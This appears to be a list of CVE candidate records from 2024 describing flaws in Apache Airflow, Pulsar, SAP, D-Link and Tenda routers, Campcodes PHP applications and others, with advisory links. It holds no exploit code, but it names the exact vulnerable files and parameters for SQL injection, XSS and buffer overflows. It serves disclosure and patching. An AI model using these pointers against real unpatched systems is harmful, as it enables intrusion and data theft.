CVE    2024    27906    Candidate    Apache Airflow, versions before 2.8.2, has a vulnerability that allows authenticated users to view DAG code and import errors of DAGs they do not have permission to view through the API and the UI. Users of Apache Airflow are recommended to upgrade to version 2.8.2 or newer to mitigate the risk associated with this vulnerability    MISC:https://github.com/apache/airflow/pull/37290   |   URL:https://github.com/apache/airflow/pull/37290   |   MISC:https://github.com/apache/airflow/pull/37468   |   URL:https://github.com/apache/airflow/pull/37468   |   MISC:https://lists.apache.org/thread/on4f7t5sqr3vfgp1pvkck79wv7mq9st5   |   URL:https://lists.apache.org/thread/on4f7t5sqr3vfgp1pvkck79wv7mq9st5   |   MLIST:[oss-security] 20240229 CVE-2024-27906: Apache Airflow: Dag Code and Import Error Permissions Ignored   |   URL:http://www.openwall.com/lists/oss-security/2024/02/29/1    Assigned (20240227)
CVE    2024    27905    Candidate    ** UNSUPPORTED WHEN ASSIGNED ** Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache Aurora. An endpoint exposing internals to unauthenticated users can be used as a "padding oracle" allowing an anonymous attacker to construct a valid authentication cookie. Potentially this could be combined with vulnerabilities in other components to achieve remote code execution. As this project is retired, we do not plan to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.    MISC:https://lists.apache.org/thread/564kbv3wqdzkscmdn2bg4vlk48qymryp   |   URL:https://lists.apache.org/thread/564kbv3wqdzkscmdn2bg4vlk48qymryp   |   MLIST:[oss-security] 20240227 CVE-2024-27905: Apache Aurora: padding oracle can allow construction an authentication cookie   |   URL:http://www.openwall.com/lists/oss-security/2024/02/27/3    Assigned (20240227)
CVE    2024    27902    Candidate    Applications based on SAP GUI for HTML in SAP NetWeaver AS ABAP - versions 7.89, 7.93, do not sufficiently encode user-controlled inputs, resulting in Cross-Site Scripting (XSS) vulnerability. A successful attack can allow a malicious attacker to access and modify data through their ability to execute code in a user’s browser. There is no impact on the availability of the system    MISC:https://me.sap.com/notes/3377979   |   URL:https://me.sap.com/notes/3377979   |   MISC:https://support.sap.com/en/my-support/knowledge-base/security-notes-news.html?anchorId=section_370125364   |   URL:https://support.sap.com/en/my-support/knowledge-base/security-notes-news.html?anchorId=section_370125364    Assigned (20240227)
CVE    2024    27900    Candidate    Due to missing authorization check, attacker with business user account in SAP ABAP Platform - version 758, 795, can change the privacy setting of job templates from shared to private. As a result, the selected template would only be accessible to the owner.    MISC:https://me.sap.com/notes/3419022   |   URL:https://me.sap.com/notes/3419022   |   MISC:https://support.sap.com/en/my-support/knowledge-base/security-notes-news.html?anchorId=section_370125364   |   URL:https://support.sap.com/en/my-support/knowledge-base/security-notes-news.html?anchorId=section_370125364    Assigned (20240227)
CVE    2024    27894    Candidate    The Pulsar Functions Worker includes a capability that permits authenticated users to create functions where the function's implementation is referenced by a URL. The supported URL schemes include "file", "http", and "https". When a function is created using this method, the Functions Worker will retrieve the implementation from the URL provided by the user. However, this feature introduces a vulnerability that can be exploited by an attacker to gain unauthorized access to any file that the Pulsar Functions Worker process has permissions to read. This includes reading the process environment which potentially includes sensitive information, such as secrets. Furthermore, an attacker could leverage this vulnerability to use the Pulsar Functions Worker as a proxy to access the content of remote HTTP and HTTPS endpoint URLs. This could also be used to carry out denial of service attacks. This vulnerability also applies to the Pulsar Broker when it is configured with "functionsWorkerEnabled=true". This issue affects Apache Pulsar versions from 2.4.0 to 2.10.5, from 2.11.0 to 2.11.3, from 3.0.0 to 3.0.2, from 3.1.0 to 3.1.2, and 3.2.0. 2.10 Pulsar Function Worker users should upgrade to at least 2.10.6. 2.11 Pulsar Function Worker users should upgrade to at least 2.11.4. 3.0 Pulsar Function Worker users should upgrade to at least 3.0.3. 3.1 Pulsar Function Worker users should upgrade to at least 3.1.3. 3.2 Pulsar Function Worker users should upgrade to at least 3.2.1. Users operating versions prior to those listed above should upgrade to the aforementioned patched versions or newer versions. The updated versions of Pulsar Functions Worker will, by default, impose restrictions on the creation of functions using URLs. For users who rely on this functionality, the Function Worker configuration provides two configuration keys: "additionalEnabledConnectorUrlPatterns" and "additionalEnabledFunctionsUrlPatterns". 
These keys allow users to specify a set of URL patterns that are permitted, enabling the creation of functions using URLs that match the defined patterns. This approach ensures that the feature remains available to those who require it, while limiting the potential for unauthorized access and exploitation.    MISC:https://lists.apache.org/thread/45cqhgqg8d19ongjw18ypcss8vwh206p   |   URL:https://lists.apache.org/thread/45cqhgqg8d19ongjw18ypcss8vwh206p   |   MISC:https://pulsar.apache.org/security/CVE-2024-27894/   |   URL:https://pulsar.apache.org/security/CVE-2024-27894/    Assigned (20240226)
CVE    2024    27889    Candidate    Multiple SQL Injection vulnerabilities exist in the reporting application of the Arista Edge Threat Management - Arista NG Firewall (NGFW). A user with advanced report application access rights can exploit the SQL injection, allowing them to execute commands on the underlying operating system with elevated privileges.    MISC:https://https://www.arista.com/en/support/advisories-notices/security-advisory/19038-security-advisory-0093   |   URL:https://https://www.arista.com/en/support/advisories-notices/security-advisory/19038-security-advisory-0093    Assigned (20240226)
CVE    2024    2780    Candidate    A vulnerability was found in Campcodes Online Marriage Registration System 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /admin/admin-profile.php. The manipulation of the argument adminname leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-257614 is the identifier assigned to this vulnerability.    MISC:VDB-257614 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257614   |   MISC:VDB-257614 | Campcodes Online Marriage Registration System admin-profile.php cross site scripting   |   URL:https://vuldb.com/?id.257614   |   MISC:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20Marriage%20Registration%20System/Complete%20Online%20Marriage%20Registration%20System%20-%20vuln%205.pdf   |   URL:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20Marriage%20Registration%20System/Complete%20Online%20Marriage%20Registration%20System%20-%20vuln%205.pdf    Assigned (20240321)
CVE    2024    2779    Candidate    A vulnerability was found in Campcodes Online Marriage Registration System 1.0. It has been classified as problematic. This affects an unknown part of the file /admin/application-bwdates-reports-details.php. The manipulation of the argument fromdate leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257613 was assigned to this vulnerability.    MISC:VDB-257613 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257613   |   MISC:VDB-257613 | Campcodes Online Marriage Registration System application-bwdates-reports-details.php cross site scripting   |   URL:https://vuldb.com/?id.257613   |   MISC:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20Marriage%20Registration%20System/Complete%20Online%20Marriage%20Registration%20System%20-%20vuln%204.pdf   |   URL:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20Marriage%20Registration%20System/Complete%20Online%20Marriage%20Registration%20System%20-%20vuln%204.pdf    Assigned (20240321)
CVE    2024    2778    Candidate    A vulnerability was found in Campcodes Online Marriage Registration System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /admin/search.php. The manipulation of the argument searchdata leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257612.    MISC:VDB-257612 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257612   |   MISC:VDB-257612 | Campcodes Online Marriage Registration System search.php cross site scripting   |   URL:https://vuldb.com/?id.257612   |   MISC:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20Marriage%20Registration%20System/Complete%20Online%20Marriage%20Registration%20System%20-%20vuln%203.pdf   |   URL:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20Marriage%20Registration%20System/Complete%20Online%20Marriage%20Registration%20System%20-%20vuln%203.pdf    Assigned (20240321)
CVE    2024    27774    Candidate    Unitronics Unistream Unilogic – Versions prior to 1.35.227 - CWE-259: Use of Hard-coded Password may allow disclosing Sensitive Information Embedded inside Device's Firmware    MISC:https://claroty.com/team82/blog/new-critical-vulnerabilities-in-unitronics-unistream-devices-uncovered   |   URL:https://claroty.com/team82/blog/new-critical-vulnerabilities-in-unitronics-unistream-devices-uncovered   |   MISC:https://www.gov.il/en/departments/dynamiccollectors/cve_advisories_listing?skip=0   |   URL:https://www.gov.il/en/departments/dynamiccollectors/cve_advisories_listing?skip=0    Assigned (20240226)
CVE    2024    27773    Candidate    Unitronics Unistream Unilogic – Versions prior to 1.35.227 - CWE-348: Use of Less Trusted Source may allow RCE    MISC:https://claroty.com/team82/blog/new-critical-vulnerabilities-in-unitronics-unistream-devices-uncovered   |   URL:https://claroty.com/team82/blog/new-critical-vulnerabilities-in-unitronics-unistream-devices-uncovered   |   MISC:https://www.gov.il/en/departments/dynamiccollectors/cve_advisories_listing?skip=0   |   URL:https://www.gov.il/en/departments/dynamiccollectors/cve_advisories_listing?skip=0    Assigned (20240226)
CVE    2024    27772    Candidate    Unitronics Unistream Unilogic – Versions prior to 1.35.227 - CWE-78: 'OS Command Injection' may allow RCE    MISC:https://claroty.com/team82/blog/new-critical-vulnerabilities-in-unitronics-unistream-devices-uncovered   |   URL:https://claroty.com/team82/blog/new-critical-vulnerabilities-in-unitronics-unistream-devices-uncovered   |   MISC:https://www.gov.il/en/departments/dynamiccollectors/cve_advisories_listing?skip=0   |   URL:https://www.gov.il/en/departments/dynamiccollectors/cve_advisories_listing?skip=0    Assigned (20240226)
CVE    2024    27771    Candidate    Unitronics Unistream Unilogic – Versions prior to 1.35.227 - CWE-22: 'Path Traversal' may allow RCE    MISC:https://claroty.com/team82/blog/new-critical-vulnerabilities-in-unitronics-unistream-devices-uncovered   |   URL:https://claroty.com/team82/blog/new-critical-vulnerabilities-in-unitronics-unistream-devices-uncovered   |   MISC:https://www.gov.il/en/departments/dynamiccollectors/cve_advisories_listing?skip=0   |   URL:https://www.gov.il/en/departments/dynamiccollectors/cve_advisories_listing?skip=0    Assigned (20240226)
CVE    2024    27770    Candidate    Unitronics Unistream Unilogic – Versions prior to 1.35.227 - CWE-23: Relative Path Traversal    MISC:https://claroty.com/team82/blog/new-critical-vulnerabilities-in-unitronics-unistream-devices-uncovered   |   URL:https://claroty.com/team82/blog/new-critical-vulnerabilities-in-unitronics-unistream-devices-uncovered   |   MISC:https://www.gov.il/en/departments/dynamiccollectors/cve_advisories_listing?skip=0   |   URL:https://www.gov.il/en/departments/dynamiccollectors/cve_advisories_listing?skip=0    Assigned (20240226)
CVE    2024    2777    Candidate    A vulnerability has been found in Campcodes Online Marriage Registration System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /admin/application-bwdates-reports-details.php. The manipulation of the argument fromdate leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257611.    MISC:VDB-257611 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257611   |   MISC:VDB-257611 | Campcodes Online Marriage Registration System application-bwdates-reports-details.php sql injection   |   URL:https://vuldb.com/?id.257611   |   MISC:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20Marriage%20Registration%20System/Complete%20Online%20Marriage%20Registration%20System%20-%20vuln%202.pdf   |   URL:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20Marriage%20Registration%20System/Complete%20Online%20Marriage%20Registration%20System%20-%20vuln%202.pdf    Assigned (20240321)
CVE    2024    27769    Candidate    Unitronics Unistream Unilogic – Versions prior to 1.35.227 - CWE-200: Exposure of Sensitive Information to an Unauthorized Actor may allow Taking Ownership Over Devices    MISC:https://claroty.com/team82/blog/new-critical-vulnerabilities-in-unitronics-unistream-devices-uncovered   |   URL:https://claroty.com/team82/blog/new-critical-vulnerabilities-in-unitronics-unistream-devices-uncovered   |   MISC:https://www.gov.il/en/departments/dynamiccollectors/cve_advisories_listing?skip=0   |   URL:https://www.gov.il/en/departments/dynamiccollectors/cve_advisories_listing?skip=0    Assigned (20240226)
CVE    2024    27767    Candidate    CWE-287: Improper Authentication may allow Authentication Bypass    MISC:https://www.gov.il/en/departments/dynamiccollectors/cve_advisories_listing?skip=0   |   URL:https://www.gov.il/en/departments/dynamiccollectors/cve_advisories_listing?skip=0    Assigned (20240226)
CVE    2024    27765    Candidate    Directory Traversal vulnerability in Jeewms v.3.7 and before allows a remote attacker to obtain sensitive information via the cgformTemplateController component.    MISC:https://gitee.com/erzhongxmu/JEEWMS/issues/I8YN90    Assigned (20240226)
CVE    2024    27764    Candidate    An issue in Jeewms v.3.7 and before allows a remote attacker to escalate privileges via the AuthInterceptor component.    MISC:https://gitee.com/erzhongxmu/JEEWMS/issues/I8YN90    Assigned (20240226)
CVE    2024    2776    Candidate    A vulnerability, which was classified as critical, was found in Campcodes Online Marriage Registration System 1.0. Affected is an unknown function of the file /admin/search.php. The manipulation of the argument searchdata leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-257610 is the identifier assigned to this vulnerability.    MISC:VDB-257610 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257610   |   MISC:VDB-257610 | Campcodes Online Marriage Registration System search.php sql injection   |   URL:https://vuldb.com/?id.257610   |   MISC:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20Marriage%20Registration%20System/Complete%20Online%20Marriage%20Registration%20System%20-%20vuln%201.pdf   |   URL:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20Marriage%20Registration%20System/Complete%20Online%20Marriage%20Registration%20System%20-%20vuln%201.pdf    Assigned (20240321)
CVE    2024    27758    Candidate    In RPyC before 6.0.0, when a server exposes a method that calls the attribute named __array__ for a client-provided netref (e.g., np.array(client_netref)), a remote attacker can craft a class that results in remote code execution.    MISC:https://gist.github.com/renbou/957f70d27470982994f12a1d70153d09   |   MISC:https://github.com/tomerfiliba-org/rpyc/security/advisories/GHSA-h5cg-53g7-gqjw    Assigned (20240226)
CVE    2024    27757    Candidate    flusity CMS through 2.45 allows tools/addons_model.php Gallery Name XSS. The reporter indicates that this product "ceased its development as of February 2024."    MISC:https://github.com/jubilianite/flusity-CMS/security/advisories/GHSA-5843-5m74-7fqh    Assigned (20240226)
CVE    2024    27756    Candidate    An issue in GLPI v.10.0.12 and before allows a remote attacker to execute arbitrary code, escalate privileges, and obtain sensitive information via a crafted script to the title field.    MISC:https://medium.com/@cristiansindile/formula-injection-in-glpi-cve-2024-27756-3649c7cca092    Assigned (20240226)
CVE    2024    2775    Candidate    A vulnerability, which was classified as problematic, has been found in Campcodes Online Marriage Registration System 1.0. This issue affects some unknown processing of the file /user/user-profile.php. The manipulation of the argument lname leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257609 was assigned to this vulnerability.    MISC:VDB-257609 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257609   |   MISC:VDB-257609 | Campcodes Online Marriage Registration System user-profile.php cross site scripting   |   URL:https://vuldb.com/?id.257609   |   MISC:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20Marriage%20Registration%20System%20-%20vuln%202.pdf   |   URL:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20Marriage%20Registration%20System%20-%20vuln%202.pdf    Assigned (20240321)
CVE    2024    27747    Candidate    File Upload vulnerability in Petrol Pump Mangement Software v.1.0 allows an attacker to execute arbitrary code via a crafted payload to the email Image parameter in the profile.php component.    MISC:https://github.com/shubham-s-pandey/CVE_POC/blob/main/CVE-2024-27747.md    Assigned (20240226)
CVE    2024    27746    Candidate    SQL Injection vulnerability in Petrol Pump Mangement Software v.1.0 allows an attacker to execute arbitrary code via a crafted payload to the email address parameter in the index.php component.    MISC:https://github.com/shubham-s-pandey/CVE_POC/blob/main/CVE-2024-27746.md    Assigned (20240226)
CVE    2024    27744    Candidate    Cross Site Scripting vulnerability in Petrol Pump Mangement Software v.1.0 allows an attacker to execute arbitrary code via a crafted payload to the image parameter in the profile.php component.    MISC:https://github.com/shubham-s-pandey/CVE_POC/blob/main/CVE-2024-27744.md    Assigned (20240226)
CVE    2024    27743    Candidate    Cross Site Scripting vulnerability in Petrol Pump Mangement Software v.1.0 allows an attacker to execute arbitrary code via a crafted payload to the Address parameter in the add_invoices.php component.    MISC:https://github.com/shubham-s-pandey/CVE_POC/blob/main/CVE-2024-27743.md    Assigned (20240226)
CVE    2024    2774    Candidate    A vulnerability classified as critical was found in Campcodes Online Marriage Registration System 1.0. This vulnerability affects unknown code of the file /user/search.php. The manipulation of the argument searchdata leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257608.    MISC:VDB-257608 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257608   |   MISC:VDB-257608 | Campcodes Online Marriage Registration System search.php sql injection   |   URL:https://vuldb.com/?id.257608   |   MISC:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20Marriage%20Registration%20System%20-%20vuln%201.pdf   |   URL:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20Marriage%20Registration%20System%20-%20vuln%201.pdf    Assigned (20240321)
CVE    2024    27734    Candidate    A Cross Site Scripting vulnerability in CSZ CMS v.1.3.0 allows an attacker to execute arbitrary code via a crafted script to the Site Name fields of the Site Settings component.    MISC:https://github.com/sms2056/cms/blob/main/3.md    Assigned (20240226)
CVE    2024    27733    Candidate    File Upload vulnerability in Byzro Network Smart s42 Management Platform v.S42 allows a local attacker to execute arbitrary code via the useratte/userattestation.php component.    MISC:https://github.com/Sadw11v/cve/blob/main/upload.md    Assigned (20240226)
CVE    2024    2773    Candidate    A vulnerability classified as problematic has been found in Campcodes Online Marriage Registration System 1.0. This affects an unknown part of the file /user/search.php. The manipulation of the argument searchdata leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257607.    MISC:VDB-257607 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257607   |   MISC:VDB-257607 | Campcodes Online Marriage Registration System search.php cross site scripting   |   URL:https://vuldb.com/?id.257607   |   MISC:https://github.com/Kurunie/vuln_report/blob/main/Complete%20Online%20Marriage%20Registration%20System's%20vuln.pdf   |   URL:https://github.com/Kurunie/vuln_report/blob/main/Complete%20Online%20Marriage%20Registration%20System's%20vuln.pdf    Assigned (20240321)
CVE    2024    27718    Candidate    SQL Injection vulnerability in Baizhuo Network Smart s200 Management Platform v.S200 allows a local attacker to obtain sensitive information and escalate privileges via the /importexport.php component.    MISC:https://github.com/tldjgggg/cve/blob/main/sql.md    Assigned (20240226)
CVE    2024    27707    Candidate    Server Side Request Forgery (SSRF) vulnerability in hcengineering Huly Platform v.0.6.202 allows attackers to run arbitrary code via upload of crafted SVG file.    MISC:https://github.com/b-hermes/vulnerability-research/tree/main/CVE-2024-27707    Assigned (20240226)
CVE    2024    27703    Candidate    Cross Site Scripting vulnerability in Leantime 3.0.6 allows a remote attacker to execute arbitrary code via the to-do title parameter.    MISC:https://github.com/b-hermes/vulnerability-research/blob/main/CVE-2024-27703/README.md    Assigned (20240226)
CVE    2024    2770    Candidate    A vulnerability was found in Campcodes Complete Online Beauty Parlor Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /admin/contact-us.php. The manipulation of the argument email leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-257606 is the identifier assigned to this vulnerability.    MISC:VDB-257606 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257606   |   MISC:VDB-257606 | Campcodes Complete Online Beauty Parlor Management System contact-us.php sql injection   |   URL:https://vuldb.com/?id.257606   |   MISC:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20Beauty%20Parlor%20Management%20System/Complete%20Online%20Beauty%20Parlor%20Management%20System%20-%20vuln%204.pdf   |   URL:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20Beauty%20Parlor%20Management%20System/Complete%20Online%20Beauty%20Parlor%20Management%20System%20-%20vuln%204.pdf    Assigned (20240321)
CVE    2024    27698    Candidate    ** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was withdrawn by its CNA. Further investigation showed that it was not a security issue. Notes: none.        Assigned (20240226)
CVE    2024    27694    Candidate    FlyCms v1.0 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via the /system/share/ztree_category_edit.    MISC:https://github.com/sms2056/cms/blob/main/1.md    Assigned (20240226)
CVE    2024    27692    Candidate    ** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2024-22939. Reason: This candidate is a duplicate of CVE-2024-22939. Notes: All CVE users should reference CVE-2024-22939 instead of this candidate.        Assigned (20240226)
CVE    2024    2769    Candidate    A vulnerability was found in Campcodes Complete Online Beauty Parlor Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /admin/admin-profile.php. The manipulation of the argument adminname leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257605 was assigned to this vulnerability.    MISC:VDB-257605 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257605   |   MISC:VDB-257605 | Campcodes Complete Online Beauty Parlor Management System admin-profile.php sql injection   |   URL:https://vuldb.com/?id.257605   |   MISC:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20Beauty%20Parlor%20Management%20System/Complete%20Online%20Beauty%20Parlor%20Management%20System%20-%20vuln%205.pdf   |   URL:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20Beauty%20Parlor%20Management%20System/Complete%20Online%20Beauty%20Parlor%20Management%20System%20-%20vuln%205.pdf    Assigned (20240321)
CVE    2024    27689    Candidate    Stupid Simple CMS v1.2.4 was discovered to contain a Cross-Site Request Forgery (CSRF) via /update-article.php.    MISC:https://github.com/Xin246/cms/blob/main/2.md    Assigned (20240226)
CVE    2024    27684    Candidate    A Cross-site scripting (XSS) vulnerability in dlapn.cgi, dldongle.cgi, dlcfg.cgi, fwup.cgi and seama.cgi in D-Link GORTAC750_A1_FW_v101b03 allows remote attackers to inject arbitrary web script or HTML via the url parameter.    MISC:https://drive.google.com/file/d/1qu4iBQGeAwolTXjVOTXsAAusSHo2ie-Y/view   |   MISC:https://www.dlink.com/en/security-bulletin/    Assigned (20240226)
CVE    2024    27683    Candidate    D-Link Go-RT-AC750 GORTAC750_A1_FW_v101b03 contains a stack-based buffer overflow via the function hnap_main. An attacker can send a POST request to trigger the vulnerability.    MISC:https://drive.google.com/file/d/18RhbBnaD_kH16Y6C-7TpSSPUmYKKyU_k/view   |   MISC:https://gist.github.com/sunwithmoon/428c3871482a600382fec0a1994a518b   |   MISC:https://www.dlink.com/en/security-bulletin/    Assigned (20240226)
CVE    2024    27680    Candidate    Flusity-CMS v2.33 is vulnerable to Cross Site Scripting (XSS) in the "Contact form."    MISC:https://github.com/xiaolanjing0/cms/blob/main/4.md    Assigned (20240226)
CVE    2024    2768    Candidate    A vulnerability was found in Campcodes Complete Online Beauty Parlor Management System 1.0. It has been classified as critical. Affected is an unknown function of the file /admin/edit-services.php. The manipulation of the argument editid leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257604.    MISC:VDB-257604 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257604   |   MISC:VDB-257604 | Campcodes Complete Online Beauty Parlor Management System edit-services.php sql injection   |   URL:https://vuldb.com/?id.257604   |   MISC:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20Beauty%20Parlor%20Management%20System/Complete%20Online%20Beauty%20Parlor%20Management%20System%20-%20vuln%203.pdf   |   URL:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20Beauty%20Parlor%20Management%20System/Complete%20Online%20Beauty%20Parlor%20Management%20System%20-%20vuln%203.pdf    Assigned (20240321)
CVE    2024    2767    Candidate    A vulnerability was found in Campcodes Complete Online Beauty Parlor Management System 1.0 and classified as critical. This issue affects some unknown processing of the file /admin/forgot-password.php. The manipulation of the argument email leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257603.    MISC:VDB-257603 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257603   |   MISC:VDB-257603 | Campcodes Complete Online Beauty Parlor Management System forgot-password.php sql injection   |   URL:https://vuldb.com/?id.257603   |   MISC:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20Beauty%20Parlor%20Management%20System/Complete%20Online%20Beauty%20Parlor%20Management%20System%20-%20vuln%202.pdf   |   URL:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20Beauty%20Parlor%20Management%20System/Complete%20Online%20Beauty%20Parlor%20Management%20System%20-%20vuln%202.pdf    Assigned (20240321)
CVE    2024    27668    Candidate    Flusity-CMS v2.33 is affected by: Cross Site Scripting (XSS) in 'Custom Blocks.'    MISC:https://github.com/LY102483/cms/blob/main/1.md    Assigned (20240226)
CVE    2024    27662    Candidate    D-Link DIR-823G A1V1.0.2B05 was discovered to contain Null-pointer dereferences in sub_4110f4(). This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input.    MISC:https://calm-healer-839.notion.site/D-LINK-DIR-823G-NPD-0x4116F0-5befc4a65457482c8c4dcb16910ab820?pvs=4    Assigned (20240226)
CVE    2024    27661    Candidate    D-Link DIR-823G A1V1.0.2B05 was discovered to contain Null-pointer dereferences in sub_4484A8(). This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input.    MISC:https://calm-healer-839.notion.site/D-LINK-DIR-823G-NPD-0x42444C-34458f12482346b291f334eea12e6fd0?pvs=4    Assigned (20240226)
CVE    2024    27660    Candidate    D-Link DIR-823G A1V1.0.2B05 was discovered to contain Null-pointer dereferences in sub_41C488(). This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input.    MISC:https://calm-healer-839.notion.site/D-LINK-DIR-823G-NPD-0x41C708-e46f864c48114f45894f4563588d7968?pvs=4    Assigned (20240226)
CVE    2024    2766    Candidate    A vulnerability has been found in Campcodes Complete Online Beauty Parlor Management System 1.0 and classified as critical. This vulnerability affects unknown code of the file /admin/index.php. The manipulation of the argument username leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-257602 is the identifier assigned to this vulnerability.    MISC:VDB-257602 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257602   |   MISC:VDB-257602 | Campcodes Complete Online Beauty Parlor Management System index.php sql injection   |   URL:https://vuldb.com/?id.257602   |   MISC:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20Beauty%20Parlor%20Management%20System/Complete%20Online%20Beauty%20Parlor%20Management%20System%20-%20vuln%201.pdf   |   URL:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20Beauty%20Parlor%20Management%20System/Complete%20Online%20Beauty%20Parlor%20Management%20System%20-%20vuln%201.pdf    Assigned (20240321)
CVE    2024    27659    Candidate    D-Link DIR-823G A1V1.0.2B05 was discovered to contain Null-pointer dereferences in sub_42AF30(). This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input.    MISC:https://calm-healer-839.notion.site/D-LINK-DIR-823G-NPD-0x42B4C4-dfeae31d711f414796e1d9eb9cea7d31?pvs=4    Assigned (20240226)
CVE    2024    27657    Candidate    D-Link DIR-823G A1V1.0.2B05 was discovered to contain a buffer overflow via the User-Agent parameter. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input, and possibly remote code execution.    MISC:https://calm-healer-839.notion.site/D-LINK-DIR-823G-OOBW-0x41D5B0-462500887ea3464692e3e697cc43838c?pvs=4    Assigned (20240226)
CVE    2024    27656    Candidate    D-Link DIR-823G A1V1.0.2B05 was discovered to contain a buffer overflow via the Cookie parameter. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input, and possibly remote code execution.    MISC:https://calm-healer-839.notion.site/D-LINK-DIR-823G-OOBW-0x41E2A0-8ea57277c7cd4ea18dbc40bcb41a98f2?pvs=4    Assigned (20240226)
CVE    2024    27655    Candidate    D-Link DIR-823G A1V1.0.2B05 was discovered to contain a buffer overflow via the SOAPACTION parameter. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input, and possibly remote code execution.    MISC:https://calm-healer-839.notion.site/D-LINK-DIR-823G-OOBW-0x41E094-f1bd478368644136ad2e3a33e59041b2?pvs=4    Assigned (20240226)
CVE    2024    2764    Candidate    A vulnerability, which was classified as critical, was found in Tenda AC10U 15.03.06.48. This affects the function formSetPPTPServer of the file /goform/SetPptpServerCfg. The manipulation of the argument endIP leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257601 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-257601 | CTI Indicators (IOB, IOC, IOA)   |   URL:https://vuldb.com/?ctiid.257601   |   MISC:VDB-257601 | Tenda AC10U SetPptpServerCfg formSetPPTPServer stack-based overflow   |   URL:https://vuldb.com/?id.257601   |   MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC10U/v1.V15.03.06.48/more/formSetPPTPServer.md   |   URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC10U/v1.V15.03.06.48/more/formSetPPTPServer.md    Assigned (20240321)
